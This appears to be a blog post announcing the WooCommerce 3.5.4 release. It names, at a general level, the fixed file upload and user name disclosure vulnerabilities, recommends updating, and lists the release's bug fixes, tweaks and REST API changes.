WooCommerce 3.5.4 Security and Fix-Update

·

·

The security update WooCommerce 3.5.4 was released on January 21. The update contains over 50 fixes, some of them are security related. The vulnerabilities affect WooCommerce 3.5.3 and earlier and are related to file upload sanitization and customer user name disclosure. WooCommerce fixed these issues and hardened the order key generation and implemented a fix for the design flaw «RipsTech» outlined when WooCommerce is deactivated.
To prevent attacks through these vulnerabilities it is recommended to install the update as soon as possible.

Fixes

  • Unescape CSV formulas in product attributes in CSV importer/exporter.
  • Remove use of non-existing WC_REST_Dev_Setting_Options_Controller class.
  • Fix edge case where get_plugins would not have the custom WooCommerce plugin headers if get_plugins was called early.
  • Prevent PHP warning when deprecated user meta starts with uppercase.
  • Fixed support for multiple query parameters translated to meta queries via REST API requests.
  • Prevent PHP errors when trying to access non-existant report tabs.
  • Filter by attributes dropdown placeholder text should not be wrapped in quotes.
  • Apply sale price until end of closing sale date.
  • Allow empty schema again when registering a custom field for the API.
  • Don’t display escaped html on checkout when javascript is disabled.
  • Fixed formatted address in uppercase for languages that use accents.
  • Reload the cart page when the cart is empty when there is a hash in the URL.
  • Do not schedule duplicate webhooks within 10 minutes of each other to maintain previous behavior.
  • Return correct next scheduled date for items in queue by fixing date instantiation in WC_Action_Queue::get_next().
  • Allow products to use default low stock threshold.
  • Fix 0 value attribute permalink calculation, property population in REST api.
  • Ensure cache delete on coupon trash or delete.
  • Ensure product parent exists before getting its image.
  • Correctly use wildcard character on email restrictions on coupons.
  • Avoids Warnings in Action Scheduler Library for PHP 5.2.
  • Don’t include product in BreadcrumbList structured data so Google will recognize stand-alone Product structured data.
  • Fix Product widget showing hidden products when hide out of stock was enabled.
  • Run webhook status updates through new wc_is_webhook_valid_status functions when doing API requests.
  • Correct quote handling in tax class names.
  • Prevent style side-effects on notices on the Extensions pages.
  • Check stock status of items when ‹ordering again› from the account page.
  • Improve rounding when rounding at subtotal level in cart.
  • Restores an opportunity to print non-cart related notices that a few extensions are relying on.
  • Correct order item meta alignment in order emails when using an RTL language.
  • Fix bug where product status was erroneously going to draft status in some circumstances on new published variable products. Load customer data for logged in users regardless of being member of sub-site to avoid errors.
  • Use slug sanitization on product export category slugs for better foreign character support.
  • Correct item subtotal rounding when multiple taxes are applied so it matches the cart.
  • Prevent fatal errors when retrieving network orders for sites that do not have WooCommerce activated.
  • Numerous bug fixes around checkout field locales on first load.
  • Correct position of admin notices on my-account pages.
  • Fixed padding of addresses in email template.
  • Prevevent payment method descriptions sliding up/down if selected after ajax updates.
  • Fixed formatted address in uppercase for languages that use accents.
  • Fix product updating on import for SKUs with special characters.
  • Ensure cache_delete on coupon deletion.
  • Make product edit form aware publish was pressed.
  • Unescape imported CSV formulas in product attributes.
  • Warning when deprecated user meta starts with uppercase.
  • Filter out buttons from the onRowClick event on the Orders list view page.
  • Update «Filter Products by Attribute» widget when product stock quantity changes via «Quick Edit» or WC API.
  • Ensure product parent exists before getting its image.
  • Fixed support for multiple query parameters translated to meta queries via REST API requests.
  • Strip hash from URL when reload refunds in the dashboard.
  • Prevent notice when using non existing value for tabs in WooCommerce > Reports > Stock.
  • Filter by attributes dropdown placeholder text wrapped in quotes.
  • Fix escaped html on checkout when javascript is disabled.
  • Allow empty schema again when registering a custom field for the API.
  • Fix import & export of newline characters in product description fields.
  • Allow quotes in tax class names.
  • Sale price applies to end of closing sale date.
  • Product export by unicode product categories.
  • Check stock status of items when ‹ordering again› from the account page.
  • Issue where images offloaded to external servers caused errors and broken images when changing aspect ratios.
  • Remove block comments from shop page description.

Tweaks

  • Allow limited html in woocommerce_rating_filter_count filter.
  • Remove ‹on-hold› orders from admin tax reports for more logical reporting.
  • Remove payment phrases from processing emails.
  • Removed display of cost for local pickup when free.

Developer Features – REST API

  • 0 value attribute permalink calculation, property population in REST api.
  • Fixed support to order results by slugs.
  • Removed extra inherited filters from product endpoint in variations endpoint.

Remember to create a backup before installing updates.

(Picture Courtesy of Yuri Samoilov)